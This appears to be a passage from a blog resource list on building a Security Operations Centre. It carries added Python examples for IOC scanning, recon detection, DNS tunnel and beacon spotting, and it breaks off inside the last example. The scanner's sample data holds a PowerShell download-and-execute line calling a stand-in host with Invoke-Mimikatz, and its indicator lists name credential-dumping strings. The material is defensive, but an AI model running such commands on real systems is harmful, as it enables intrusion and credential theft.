How To Build And Run A SOC for Incident Response – A Collection Of Resources

How to build a SOC / How to run a SOC

In this post I'll collect some great resources on SOCs: how to build a SOC, how to set one up, and how to run and maintain it once it is up. I will also keep the links and tools up to date as I find new and better resources.

Let me know if you have comments or additions please.

_________

1- Starting Point – Some theoretical content:

What is a SOC? A SOC is a Security Operations Centre, where people are dedicated to watching over and responding to the company's ongoing information security. They need the tools to prevent what they can and to discover and remediate what they cannot, and they need the skills to do this.

Free:

IR process template via Frode Hommedal: http://frodehommedal.no/presentations/first-tc-oslo-2015/#/slide-start

CSIRT process, new one by Frode Hommedal: http://frodehommedal.no/presentations/cert-ee-symposium-2016/#/

Report Template for Threat Intelligence and Incident Response by Lenny Zeltser

MITRE – Ten Strategies of a World-Class Cybersecurity Operations Center: https://www.mitre.org/sites/default/files/publications/pr-13-1028-mitre-10-strategies-cyber-ops-center.pdf

Building a SOC via Twitter user Rafeeq_rehman: Building_SOC.pdf

An EY SOC white paper: EY-SOC-Oct-2013.pdf

An HP SOC white paper: Building-Maturing-and-Rocking-a-Security-Operations-Center-Brandie-Anderson.pdf

The Grand List of Incident Management Frameworks via Gabor Szathmari

A slidedeck on building a SOC via Slideshare:

Design & Build a Security Operation Center – from Sameer Paradia (CGEIT,CISM,CISSP)

SANS reading room white paper on incident response: https://www.sans.org/reading-room/whitepapers/analyst/incident-response-fight-35342

OWASP Incident Response Project (via Tom Brennan): https://www.owasp.org/index.php/OWASP_Incident_Response_Project

RSA Conference 2012 presentation by Ben Rothke: Building a Security Operations Center (SOC)
McAfee – Creating and Maintaining a SOC – The details behind successful security operations centers

EMC – Creating an intelligence-driven SOC

Peerlyst resource: A list of Incident Response Playbooks by Michael Hamblin

Building a World-Class Security Operations Center: A Roadmap, by SANS

How to build and run a Security Operations Center by Nicolas Fischbach of Securite

Building and running a SOC with Splunk

Lessons learned from working in a SOC by Jen Andre of Komand

“Build a SOC or Choose an MSSP?” by Eric Carroll

How to build and run a Security Operations Center by Renato Basante Borbolla

Requiring sign-up:

AlienVault https://www.alienvault.com/resource-center/ebook/insider-guide-to-incident-response-download

Dell SecureWorks http://go.secureworks.co.uk/incident-response-preparedness

Paid:

Designing and Building Security Operations Center 1st Edition by David Nathans

Security Operations Center: Building, Operating, and Maintaining your SOC from October 2015 by Joseph Muniz, Gary McIntyre, Nadhem AlFardan

“Crafting the InfoSec Playbook: Security Monitoring and Incident Response Master Plan” by Jeff Bollinger, Brandon Enright and Matthew Valites. Thanks Sashank Dara for mentioning this.

2- Some Practical resources for incident response and SOC

Cheat Sheets:

http://www.malwarearchaeology.com/cheat-sheets

Awesome Incident response collection

Training/Certifications:
A critique of the elements of paid incident handling certifications via TaoSecurity:

http://taosecurity.blogspot.lu/2009/04/speaking-of-incident-response.html

Free:

Computer and Hacking Forensics on Cybrary.it: https://www.cybrary.it/course/computer-hacking-forensics-analyst/

Most of Opensecuritytraining http://opensecuritytraining.info/Training.html

Paid:

SANS MGT517: Managing Security Operations: Detection, Response, and Intelligence: https://www.sans.org/course/managing-security-operations-detection-response-and-intelligence

SANS SEC511: Continuous Monitoring and Security Operations: https://www.sans.org/course/continuous-monitoring-security-operations

EC-Council Certified Incident Handler: http://www.eccouncil.org/Certification/ec-council-certified-incident-handler

GIAC Certified Incident Handler (GCIH): https://www.giac.org/certification/certified-incident-handler-gcih

CERT-Certified Computer Security Incident Handler (SEI/CMU): https://www.sei.cmu.edu/training/certificates/security/handler.cfm

Incident response and network forensics on Infosecinstitute

SANS SEC504: Hacker Tools, Techniques, Exploits and Incident Handling

SANS Cyber Defense curricula: https://www.sans.org/curricula

SANS Technology Institute graduate certificate in Incident Response: https://www.sans.edu/academics/certificates/incident-response

3. Tools of the trade:

Open Source/Free:

The list of tools here on postmodernsecurity.com :
https://postmodernsecurity.com/2015/09/11/malware-analysis-and-incident-response-tools-for-the-frugal-and-lazy/

IP to ASN via Team Cymru. The IP-to-ASN service maps IP addresses to BGP prefixes and ASNs. It comes in several flavours: whois (TCP 43), DNS (UDP 53), HTTP (TCP 80) and HTTPS (TCP 443). The whois flavour has a bulk mode, which is the one to use when enriching a list of indicators rather than a single address.
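As an added example (my own code, not Team Cymru's client), here is the whois bulk exchange in Python: build the request, parse the pipe-separated verbose rows, and pivot the results by AS so that indicators sitting in the same network stand out. The sample response is constructed in the documented layout so the parser can be exercised offline; the real query needs outbound TCP 43.

```python
"""Map IPs to ASNs through the Team Cymru whois bulk interface (TCP 43).

Added example, not Team Cymru's own client. The request/response layout follows
the service's documented bulk mode ("begin"/"verbose"/.../"end", pipe-separated
rows); the sample response below is constructed for offline use.
"""
import socket
from dataclasses import dataclass
from typing import Dict, Iterable, List

CYMRU_WHOIS = ("whois.cymru.com", 43)


@dataclass
class AsnRecord:
    asn: str
    ip: str
    prefix: str
    cc: str
    registry: str
    allocated: str
    as_name: str


def build_bulk_request(ips: Iterable[str]) -> str:
    """'verbose' adds country, registry, allocation date and AS name columns."""
    body = "\n".join(ip.strip() for ip in ips if ip.strip())
    return f"begin\nverbose\n{body}\nend\n"


def parse_bulk_response(text: str) -> Dict[str, AsnRecord]:
    """Turn the pipe-delimited verbose rows into AsnRecords keyed by queried IP.

    The 'Bulk mode; ...' banner, the column header (starts with 'AS ') and any
    'Error:' lines are skipped. Unrouted space comes back with 'NA' in the AS column.
    """
    records: Dict[str, AsnRecord] = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith(("Bulk mode", "Error", "AS ")):
            continue
        fields = [f.strip() for f in line.split("|")]
        if len(fields) != 7:
            continue  # not a verbose data row
        rec = AsnRecord(*fields)
        records[rec.ip] = rec
    return records


def group_by_asn(records: Dict[str, AsnRecord]) -> Dict[str, List[str]]:
    """Pivot: indicators that share an AS are worth a second look as one cluster."""
    groups: Dict[str, List[str]] = {}
    for rec in records.values():
        groups.setdefault(rec.asn, []).append(rec.ip)
    return groups


def lookup(ips: Iterable[str], timeout: float = 10.0) -> Dict[str, AsnRecord]:
    """Live lookup: one TCP session for the whole batch (needs network access)."""
    with socket.create_connection(CYMRU_WHOIS, timeout=timeout) as sock:
        sock.sendall(build_bulk_request(ips).encode())
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return parse_bulk_response(b"".join(chunks).decode(errors="replace"))


# Constructed sample in the verbose layout (banner, header, two data rows).
SAMPLE_RESPONSE = """\
Bulk mode; whois.cymru.com [2016-11-09 10:00:00 +0000]
AS      | IP               | BGP Prefix          | CC | Registry | Allocated  | AS Name
15169   | 8.8.8.8          | 8.8.8.0/24          | US | arin     | 1992-12-01 | GOOGLE - Google LLC, US
NA      | 10.0.0.5         | NA                  |    |          |            | NA
"""

if __name__ == "__main__":
    for ip, rec in parse_bulk_response(SAMPLE_RESPONSE).items():
        print(f"{ip:16} AS{rec.asn:8} {rec.prefix:20} {rec.as_name}")
```

One session per batch matters: the service rate-limits individual whois queries, and a list of a few thousand IPs from a pcap goes through in one connection with bulk mode.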

TotalHash: totalhash provides static and dynamic analysis of malware samples. The data on the site is free for non-commercial use, and samples you would like analyzed can be uploaded to its anonymous FTP server.

Via InfosecTDK: https://www.hybrid-analysis.com, an automated malware analysis sandbox

Malwr: a free malware analysis service and community launched in January 2011. You can submit files to it and receive the results of a complete dynamic analysis back.

Via CIRCL.LU:

Twitter user DA_667 storify on questions to ask when hiring an incident responder – storify created by

DA_667 on an IR toolset on a shoestring budget, using World of Warcraft analogies:

SIEM: ELK stack
NSM: Snort + Bro (with fullcap/flow later on when/if I had money)
Client-side: GRR + El Jefe + whatever crap A/V solution
Heroic Mode extra credit: PacketFence for shunting infected machines into a “GTFO” VLAN for re-imaging/IR purposes
25-man raid mode: Moloch for FPC.

Remote IOC scanner: https://github.com/CERT-Solucom/certitude

Defeating pass-the-hash (PtH) attacks via DFIRBLOG

Free service that unpacks, scans and analyzes almost any firmware package and detects vulnerabilities and backdoors: firmware.re

USB packet capture/sniffer: http://desowin.org/usbpcap/

JavaScript deobfuscator tool: http://www.kahusecurity.com/2015/new-javascript-deobfuscator-tool/

Live incident response in PowerShell: PSRecon https://github.com/gfoss/PSRecon

List all named pipes via PowerShell (useful for spotting C2 implants and lateral-movement tooling that talk over pipes):

PS C:\> [System.IO.Directory]::GetFiles("\\.\\pipe\\")

Security Onion and Sysmon (slides)

Security Onion Conference 2015, from DefensiveDepth

Windows live artifact acquisition script: https://github.com/OMENScan/AChoir

Laika BOSS, open sourced by Lockheed Martin: https://github.com/lmco/laikaboss/blob/master/README.md

Via Mozilla, open sourced for incident investigations: MIG, “Mozilla InvestiGator”: github.com/mozilla/mig

88 feeds, ~800K live streamable threat intel indicators for your sensors (link) via Critical Stack

Incident response hunting tools: https://sroberts.github.io/2015/04/21/hunting-tools/

Share threat information with vetted partners -> ThreatExchange via the Facebook team

Cymon: Cymon is the largest tracker of open-source security reports about phishing, malware, botnets and other malicious activities.

NBDServer: Network Block Device server for Windows with a DFIR/forensic focus, via Jeff Bryner

PyIOC: Python tools for IOC (Indicator of Compromise) handling, via Jeff Bryner

MozDef: the Mozilla Defense Platform, which automates the security incident handling process and supports the real-time activities of incident handlers. Also via Jeff Bryner (suggested by @sastrytumuluri)

Maltrail: Maltrail is a malicious traffic detection system, utilizing publicly available (black)lists containing malicious and/or generally suspicious trails, along with static trails compiled from various AV reports and custom user defined lists

FIDO by the Netflix team, for automating incident response.

FIDO is an orchestration layer used to automate the incident response process by evaluating, assessing and responding to malware. FIDO's primary purpose is to handle the heavy manual effort needed to evaluate threats coming from today's security stack and the large number of alerts they generate. As an orchestration platform FIDO can make your existing security tools more efficient and accurate by heavily reducing the manual effort needed to detect, notify and respond to attacks against a network.

FastIR Collector by SekoiaLab

This tool collects different artefacts on live Windows systems and records the results in CSV files. Analysis of these artefacts can detect a compromise early.

Kansa: a PowerShell incident response framework

Fast Incident Response (FIR) by CERT Société Générale

The awesome Incident Response Collection

SCOT:

The Sandia Cyber Omni Tracker (SCOT) is a cyber security incident response management system and knowledge base. Designed by cyber security incident responders, SCOT provides a new approach to managing security alerts, analyzing data for deeper patterns, coordinating team efforts, and capturing team knowledge. SCOT integrates with existing security applications to provide a consistent, easy to use interface that enhances analyst effectiveness.

LOKI:

Loki – Simple IOC and Incident Response scanner: https://www.bsk-consulting.de/loki-free-ioc-scanner/ . The basic idea is simple: walk the file system, and for every file compare its hash, its name and its contents against an indicator list, reporting each match with the reason it fired.
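To show what that kind of scanner does at its core, here is an added example of my own (not Loki's, certitude's or YARA's code): hash, filename-regex and byte-string indicators checked over a directory tree. The indicator values and the sample files are constructed for the demonstration and are not real malware IOCs; YARA rules would replace the crude byte-string list in a real deployment.

```python
"""Minimal Loki-style IOC scanner: walk a tree and flag files whose hash, name or
content matches an indicator list.

Added example, not Loki's, certitude's or YARA's code. The indicators and the
sample files are constructed for the demonstration; none are real malware IOCs.
"""
import hashlib
import os
import re
import tempfile
from dataclasses import dataclass
from typing import Dict, List, Tuple

HASH_IOCS: Dict[str, str] = {}   # sha256 -> description; one entry is added by build_sample_tree()
FILENAME_IOCS: List[Tuple[str, str]] = [
    (r"(?i)^svch0st\.exe$", "process-name lookalike"),
    (r"(?i)\.(scr|pif)$", "legacy executable extension"),
]
CONTENT_IOCS: List[Tuple[bytes, str]] = [
    (b"Invoke-Mimikatz", "credential dumping string"),
    (b"cmd.exe /c powershell -enc", "encoded PowerShell launcher"),
]
MAX_CONTENT_SCAN = 32 * 1024 * 1024   # hash everything, but only string-scan files up to this size


@dataclass
class Hit:
    path: str
    reason: str
    sha256: str


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_file(path: str) -> List[Hit]:
    hits: List[Hit] = []
    digest = sha256_file(path)
    if digest in HASH_IOCS:
        hits.append(Hit(path, f"hash IOC: {HASH_IOCS[digest]}", digest))
    name = os.path.basename(path)
    for pattern, desc in FILENAME_IOCS:
        if re.search(pattern, name):
            hits.append(Hit(path, f"filename IOC: {desc}", digest))
    if os.path.getsize(path) <= MAX_CONTENT_SCAN:
        with open(path, "rb") as fh:
            data = fh.read()
        for needle, desc in CONTENT_IOCS:
            if needle in data:
                hits.append(Hit(path, f"content IOC: {desc}", digest))
    return hits


def scan_tree(root: str) -> List[Hit]:
    hits: List[Hit] = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            try:
                hits.extend(scan_file(os.path.join(dirpath, fn)))
            except OSError:
                continue   # locked or unreadable file; a real scanner logs these
    return hits


def build_sample_tree() -> str:
    """Write constructed sample files into a temp dir and register one as a hash IOC."""
    root = tempfile.mkdtemp(prefix="iocscan_")
    samples = {
        "notes.txt": b"quarterly report draft",
        "svch0st.exe": b"MZ\x90\x00 fake binary, not a real PE",
        "update.ps1": b"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a'); Invoke-Mimikatz",
        "dropper.bin": b"cmd.exe /c powershell -enc SQBFAFgA",
    }
    for name, content in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(content)
    HASH_IOCS[sha256_file(os.path.join(root, "dropper.bin"))] = "known dropper sample"
    return root


def run_demo() -> Dict[str, List[str]]:
    """Scan the sample tree; return {file name: [reasons]} for every flagged file."""
    report: Dict[str, List[str]] = {}
    for hit in scan_tree(build_sample_tree()):
        report.setdefault(os.path.basename(hit.path), []).append(hit.reason)
    return report


if __name__ == "__main__":
    for name, reasons in sorted(run_demo().items()):
        print(f"{name}: {'; '.join(reasons)}")
```

Two practical points the toy version already shows: every hit carries the file hash so it can be pivoted on later, and unreadable files are skipped rather than aborting the scan, which is exactly what happens on a live system with locked handles.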

Volatility & Volatility Autoruns:

Volatility autoruns plugin: Finding persistence points (also called “Auto-Start Extensibility Points”, or ASEPs) is a recurring task of any investigation potentially involving malware. To make an analyst's life a bit easier, I came up with the autoruns plugin. autoruns basically automates most of the tasks you would need to run when trying to find out where malware is persisting from. Once all the autostart locations are found, they are matched with running processes in memory.

IR_Tool: a simple bash script for digital forensics on Linux/Unix systems

Malcom: Malware Communication Analyzer

Malcom is a tool designed to analyze a system's network communication using graphical representations of network traffic, and to cross-reference them with known malware sources. This comes in handy when analyzing how certain malware families try to communicate with the outside world.

YARA – The pattern matching swiss knife

IRTriage – Incident Response Triage – Windows evidence collection for forensic analysis

Skydive: An Open Source real-time network topology and protocols analyzer

EMET 5.5. Always relevant to use, especially now that it can block Casey Smith's (SubTee) regsvr32 AppLocker bypass. Instructions on that here.

reassemble_dns – nice tool to read pcap files, extract DNS messages and write them into a file. IP fragments and TCP streams are reassembled first, so DNS over TCP and fragmented responses are not lost.

Mandiant Redline (free, but not open source): https://www.fireeye.com/services/freeware/redline.html

ANZ Nighthawk / NighthawkResponse is a new incident response tool for working with Mandiant Redline output: https://github.com/biggiesmallsAG/nightHawkResponse

DNStwist / CrazyParser – identify typosquatting phishing domains

DNS Probe and DNS_analyze -> identify, capture and analyze DNS traffic. Link and Link.

Good tool collection by category on dfir.training blog: http://www.dfir.training/index.php/tools/new

OSXCollector which has now been turned into AMIRA: Automated Malware Incident Response & Analysis

IRMA: Incident Response Malware Analysis. Today's defense is not only about learning about a file, but also about getting a fine overview of the incident you dealt with: where and when a malicious file has been seen, who submitted a hash, where a hash has been noticed, which anti-virus detects it. IRMA intends to be an open-source platform designed to help identify and analyze malicious files.

New (Nov, 2016): Introducing TheHive: a Scalable, Open Source and Free Incident Response Platform blog.thehive-project.org/2016/11/07/int…

140 free forensics tools: https://forensiccontrol.com/resources/free-software/

_________

Commercial solutions:

Syncurity IR – Implement a repeatable, scalable, auditable process across your entire security operations and incident response lifecycle.

The Demisto platform – the automation and collaboration platform for your security operations center (an evaluation of this is still needed; please let me know if you've used it).

Using RiskIQ PassiveTotal for automated infrastructure alerts

Strake-IR from 9yahds is a security incident response orchestration solution; a 2-seat subscription is free. http://9yahds.com/

_________

4. Relevant Blogs/Slides:

Introduction to DFIR https://sroberts.github.io/2016/01/11/introduction-to-dfir-the-beginning

Free reverse engineering tools list https://wiremask.eu/articles/free-reverse-engineering-tools/

(In time this will be completed: https://www.peerlyst.com/blog-post/resource-incident-response-guide)

Incident response must improve! https://www.peerlyst.com/blog-post/security-incident-response-must-improve

Preparing for Incident Response https://www.peerlyst.com/blog-post/incident-response-preparation

Getting Management Buy-in for IR https://blog.peerlyst.com/blog-post/incident-response-management-buyin

Dealing with analyst fatigue https://www.peerlyst.com/blog-post/incident-response-how-do-you-deal-with-analyst-fatigue

The importance of process https://www.peerlyst.com/blog-post/incident-response-the-importance-of-process

Infosecinstitute on SOC: http://resources.infosecinstitute.com/security-operations-center/

10 attributes of a leading SOC https://www.rooksecurity.com/10-attributes-of-a-leading-security-operations-center-soc-in-2014-2/

Automating Forensic Artifact Collection with Splunk and GRR (link)

NoSQL forensics

Report template for threat intelligence and Incident Response (link)

Added: MS Ignite presentation: Windows Event Forwarding / Centralized logging for everyone, via Jessica Payne

How to Manage a Large Volume of Cyber Alerts via securityweek

Extracting a PCAP from memory https://isc.sans.edu/forums/diary/Extracting+pcap+from+memory/20639

Windows commands abused by attackers (JPCERT): http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html . The post groups the built-in commands attackers run after landing on a host (initial investigation, reconnaissance, spreading) and notes that most of them are rarely used by ordinary users, which is what makes them detectable.

Windows 10 and enhanced powershell logging https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html

From RSAC 2016 by Mark Russinovich:

“Machine Learning and the Cloud: Disrupting Threat Detection and Prevention”

“Tracking Hackers on Your Network with Sysinternals Sysmon”

CrowdStrike blog: Recon detection by the blue team: http://www.crowdstrike.com/blog/reconnaissance-detection-blue-team/
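The JPCERT and CrowdStrike posts above both come down to the same detection: one discovery command on a workstation is noise, a burst of different ones inside a few minutes is a sign someone just landed. As an added example of my own (not code from either post), the Python below runs that logic over constructed process-creation events in a simplified Sysmon Event ID 1 shape; the field names and the DISCOVERY list are this example's own choices, not JPCERT's full table, and the window and threshold are starting points to tune against your own baseline.

```python
"""Flag hosts where several different discovery commands run within a short
window, the pattern the JPCERT and CrowdStrike posts above describe.

Added example, not code from either post. Events are constructed in a simplified
Sysmon Event ID 1 shape (field names assumed) and the DISCOVERY list is this
example's own selection, not JPCERT's full table.
"""
import shlex
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterable, Optional, Set, Tuple

# (executable, first argument) pairs counted as discovery; None matches any argument.
DISCOVERY: Set[Tuple[str, Optional[str]]] = {
    ("whoami", None), ("hostname", None), ("systeminfo", None), ("tasklist", None),
    ("ipconfig", None), ("netstat", None), ("quser", None), ("nltest", None),
    ("net", "user"), ("net", "group"), ("net", "localgroup"), ("net", "view"),
    ("net", "share"), ("net", "use"), ("net", "config"), ("net", "time"),
}
WINDOW = timedelta(minutes=10)
MIN_DISTINCT = 5   # one 'ipconfig' is noise; five different discovery commands is not


def classify(cmdline: str) -> Optional[Tuple[str, Optional[str]]]:
    """Normalise a command line to its DISCOVERY key, or None if it is not one."""
    try:
        argv = shlex.split(cmdline, posix=False)   # keep Windows backslashes intact
    except ValueError:
        return None
    if not argv:
        return None
    exe = argv[0].strip('"').rsplit("\\", 1)[-1].lower()
    if exe.endswith(".exe"):
        exe = exe[:-4]
    if exe == "net1":   # net.exe delegates most verbs to net1.exe
        exe = "net"
    sub = argv[1].lower() if len(argv) > 1 else None
    if (exe, sub) in DISCOVERY:
        return (exe, sub)
    if (exe, None) in DISCOVERY:
        return (exe, None)
    return None


def detect_recon_bursts(events: Iterable[dict]) -> Dict[str, dict]:
    """Per host, slide a WINDOW over discovery commands and alert on MIN_DISTINCT kinds."""
    per_host: Dict[str, list] = defaultdict(list)
    for ev in events:
        key = classify(ev["CommandLine"])
        if key:
            per_host[ev["Computer"]].append((datetime.fromisoformat(ev["UtcTime"]), key, ev["User"]))
    alerts: Dict[str, dict] = {}
    for host, items in per_host.items():
        items.sort(key=lambda item: item[0])
        start = 0
        seen: Set[Tuple[str, Optional[str]]] = set()
        for end in range(len(items)):
            while items[end][0] - items[start][0] > WINDOW:
                start += 1
            distinct = {k for _, k, _ in items[start:end + 1]}
            if len(distinct) < MIN_DISTINCT:
                continue
            alert = alerts.setdefault(host, {"user": items[end][2], "first": items[start][0].isoformat()})
            alert["last"] = items[end][0].isoformat()   # keep extending while the burst continues
            seen |= distinct
        if host in alerts:
            alerts[host]["commands"] = sorted(" ".join(p for p in k if p) for k in seen)
    return alerts


def _ev(ts: str, host: str, user: str, cmd: str) -> dict:
    return {"UtcTime": ts, "Computer": host, "User": user, "CommandLine": cmd}


# Constructed events: WS-042 shows a post-compromise recon burst,
# WS-007 only isolated admin commands hours apart.
SAMPLE_EVENTS = [
    _ev("2016-11-09T09:00:05", "WS-042", "CORP\\jdoe", "whoami /all"),
    _ev("2016-11-09T09:00:21", "WS-042", "CORP\\jdoe", "net user /domain"),
    _ev("2016-11-09T09:00:40", "WS-042", "CORP\\jdoe", 'net group "domain admins" /domain'),
    _ev("2016-11-09T09:01:02", "WS-042", "CORP\\jdoe", "ipconfig /all"),
    _ev("2016-11-09T09:01:30", "WS-042", "CORP\\jdoe", "tasklist /v"),
    _ev("2016-11-09T09:02:10", "WS-042", "CORP\\jdoe", "net view /domain"),
    _ev("2016-11-09T09:02:15", "WS-042", "CORP\\jdoe", "C:\\Windows\\System32\\notepad.exe notes.txt"),
    _ev("2016-11-09T09:00:00", "WS-007", "CORP\\asmith", "ipconfig /all"),
    _ev("2016-11-09T14:00:00", "WS-007", "CORP\\asmith", "netstat -ano"),
]

if __name__ == "__main__":
    for host, alert in detect_recon_bursts(SAMPLE_EVENTS).items():
        print(host, alert)
```

This is the same logic you would express as a correlation search in a SIEM; doing it in a few lines of Python first lets you check the false-positive rate on exported data (help-desk staff and admins run these commands too) before you turn it into a production rule.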

Improving Incident Response Investigations by JP Bourget: https://www.peerlyst.com/posts/improving-incident-response-investigations-jp-bourget-1

WMI persistence blog and how to detect this persistence: http://windowsir.blogspot.lu/2016/04/cool-stuff-re-wmi-persistence.html , which includes links to Matt Graeber's Black Hat USA 2015 presentation paper on this topic and to the Dell SecureWorks blog about their discovery.

Basic Snort Rules Syntax and Usage

SubTee SCT persistence module: https://github.com/subTee/SCTPersistence -> useful to know and be able to detect

Hacking exposed: Computer forensics blog by David Cowen. Lots of good forensics advice to be found.

From BsidesCharm: Hunting threat actors with TLS certificates. Using open source data to defend networks by Mark Parsons / @markpars0ns / mark at accessviolation.org

ELF Shared Library Injection Forensics via backtrace.io

Detecting DNS Tunnels with Packetbeat and Watcher

Data observed from monitoring DNS traffic on a network can be used as an indicator of compromise (IOC). The blog post discusses how Elasticsearch and Watcher can be used with Packetbeat to alert when possible malware activity is detected; Packetbeat is Elastic's open source packet analyzer. The signal a DNS tunnel leaves is distinctive: one client, one registered domain, and a stream of long, high-entropy subdomains that almost never repeat, because the data is being carried in the query names themselves.
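As an added example of my own (not Elastic's Packetbeat or Watcher code), here is that scoring in Python over constructed records shaped like Packetbeat DNS documents (the field names are an assumption). It aggregates per client and registered domain, then flags pairs whose subdomains are long, high-entropy and rarely repeated. The thresholds are illustrative starting points, not tuned values.

```python
"""Score DNS traffic for tunnelling: long, high-entropy, rarely repeated
subdomains under one registered domain, per client.

Added example, not Elastic's Packetbeat or Watcher code. Records are constructed
to resemble Packetbeat DNS documents (field names assumed) and the thresholds
are illustrative starting points, not tuned values.
"""
import math
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple

MIN_QUERIES = 5          # need a few samples before judging a client/domain pair
MAX_AVG_SUB_LEN = 20.0   # average length of the subdomain part, in characters
MAX_AVG_ENTROPY = 3.5    # bits per character; ordinary hostnames sit well below this
MIN_UNIQUE_RATIO = 0.8   # tunnels rarely repeat a query name; caches make real hosts repeat


def shannon_entropy(s: str) -> float:
    if not s:
        return 0.0
    counts: Dict[str, int] = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(name: str) -> Tuple[str, str]:
    """Return (subdomain, registered domain) using the last two labels.

    No public-suffix list here, so 'host.example.co.uk' would be split wrongly;
    a production version should use one.
    """
    labels = name.rstrip(".").lower().split(".")
    if len(labels) < 2:
        return "", name
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def score_domains(records: Iterable[dict]) -> Dict[str, dict]:
    """Aggregate per (client, registered domain) and flag tunnel-like behaviour."""
    buckets: Dict[tuple, List[str]] = defaultdict(list)
    for rec in records:
        qname = rec.get("dns", {}).get("question", {}).get("name")
        if not qname:
            continue
        sub, domain = split_name(qname)
        buckets[(rec.get("client_ip", "?"), domain)].append(sub)
    results: Dict[str, dict] = {}
    for (client, domain), subs in buckets.items():
        n = len(subs)
        avg_len = sum(map(len, subs)) / n
        avg_entropy = sum(shannon_entropy(s) for s in subs) / n
        unique_ratio = len(set(subs)) / n
        results[f"{client}->{domain}"] = {
            "queries": n,
            "avg_sub_len": round(avg_len, 2),
            "avg_entropy": round(avg_entropy, 2),
            "unique_ratio": round(unique_ratio, 2),
            "suspicious": (n >= MIN_QUERIES and avg_len > MAX_AVG_SUB_LEN
                           and avg_entropy > MAX_AVG_ENTROPY and unique_ratio >= MIN_UNIQUE_RATIO),
        }
    return results


def suspicious_pairs(records: Iterable[dict]) -> List[str]:
    return sorted(k for k, v in score_domains(records).items() if v["suspicious"])


def _rec(client: str, qname: str) -> dict:
    return {"type": "dns", "client_ip": client, "dns": {"question": {"name": qname, "type": "A"}}}


# Constructed sample: ordinary browsing from .20, and .77 pushing encoded chunks
# out through query names (the chunk strings are made up, not real exfil data).
SAMPLE_RECORDS = [
    _rec("10.1.1.20", "www.example.com"), _rec("10.1.1.20", "mail.example.com"),
    _rec("10.1.1.20", "www.example.com"), _rec("10.1.1.20", "cdn.example.com"),
    _rec("10.1.1.20", "api.example.com"), _rec("10.1.1.20", "www.example.com"),
] + [
    _rec("10.1.1.77", f"{chunk}.tun.example.org") for chunk in (
        "a1b2c3d4e5f6g7h8i9j0klmnopqrstuv", "zyxwvutsrqponmlkjihgfedcba987654",
        "m3n4o5p6q7r8s9t0uvwxyzabcdefghij", "k9j8i7h6g5f4e3d2c1b0azyxwvutsrqp",
        "v0w1x2y3z4a5b6c7d8e9fghijklmnopq", "pqrstuvwxyz0123456789abcdefghijk",
    )
]

if __name__ == "__main__":
    for key, stats in score_domains(SAMPLE_RECORDS).items():
        print(key, stats)
```

Expect legitimate noise from CDNs, anti-virus cloud lookups and DNSBL queries, which also use long machine-generated labels; that is why the verdict needs all four conditions together and why the first run should be against a week of your own logs, not straight into an alert.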

Not all IOC scanning is the same: scan that which helps you, via BSK-Consulting.

Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK) by MITRE

Outsourcing the SOC function can make sense: use cases for managed security services via Securosis. Thanks Sashank Dara for the link.

Diagnosis SOC-atrophy: What To Do When Your Security Operation Center Gets Sick

Proxy server logs for incident response: https://www.vanimpe.eu/2016/10/21/proxy-server-logs-incident-response/ via Koen Van Impe. Proxy logs are often the only network record that survives in an organization, and one of the most useful things to pull out of them is periodicity: a workstation that contacts the same host at the same interval for hours is either a legitimate updater or a beaconing implant, and the list of those pairs is short enough to check by hand.
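Here is that beacon check as an added example of my own, not code from the linked post: parse Squid native-format log lines (constructed here), group requests per client and destination host, and compute how regular the inter-request gaps are. The thresholds are illustrative; jittered beacons need a looser coefficient of variation or a different statistic.

```python
"""Spot beacon-like traffic in proxy logs: a client hitting one host at near-constant
intervals, which is what periodic C2 check-ins look like from the proxy's side.

Added example, not from the linked post. The log lines are constructed in Squid's
native format and the thresholds are illustrative.
"""
import re
import statistics
from collections import defaultdict
from typing import Dict, Iterable, List
from urllib.parse import urlsplit

# Squid native access.log: time elapsed client action/code bytes method url ident hierarchy/from type
SQUID_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+(?P<elapsed>\d+)\s+(?P<client>\S+)\s+(?P<status>\S+)\s+(?P<bytes>\d+)\s+"
    r"(?P<method>\S+)\s+(?P<url>\S+)\s+(?P<ident>\S+)\s+(?P<hier>\S+)\s+(?P<ctype>\S+)$"
)
MIN_REQUESTS = 8   # too few samples say nothing about regularity
MAX_CV = 0.1       # std dev of inter-request gaps / mean gap; jittered beacons push this up
MIN_GAP = 10.0     # seconds; ordinary page loads fire bursts far faster than any beacon


def parse_squid(lines: Iterable[str]) -> List[dict]:
    entries = []
    for line in lines:
        m = SQUID_RE.match(line.strip())
        if not m:
            continue   # malformed line; count these in production, silence hides tampering
        e = m.groupdict()
        e["ts"] = float(e["ts"])
        # CONNECT lines carry 'host:port' with no scheme, so fall back to the text before ':'
        e["host"] = urlsplit(e["url"]).hostname or e["url"].split(":")[0]
        entries.append(e)
    return entries


def beacon_candidates(entries: List[dict]) -> Dict[str, dict]:
    """Per (client, host): interval statistics and a beacon verdict."""
    times: Dict[tuple, List[float]] = defaultdict(list)
    paths: Dict[tuple, set] = defaultdict(set)
    for e in entries:
        key = (e["client"], e["host"])
        times[key].append(e["ts"])
        paths[key].add(urlsplit(e["url"]).path or "/")
    results: Dict[str, dict] = {}
    for key, ts in times.items():
        if len(ts) < MIN_REQUESTS:
            continue
        ts.sort()
        gaps = [b - a for a, b in zip(ts, ts[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean > 0 else float("inf")
        results[f"{key[0]}->{key[1]}"] = {
            "requests": len(ts),
            "mean_gap": round(mean, 1),
            "cv": round(cv, 3),
            "distinct_paths": len(paths[key]),
            "beacon": mean >= MIN_GAP and cv <= MAX_CV,
        }
    return results


def _line(ts: float, client: str, url: str, method: str = "GET") -> str:
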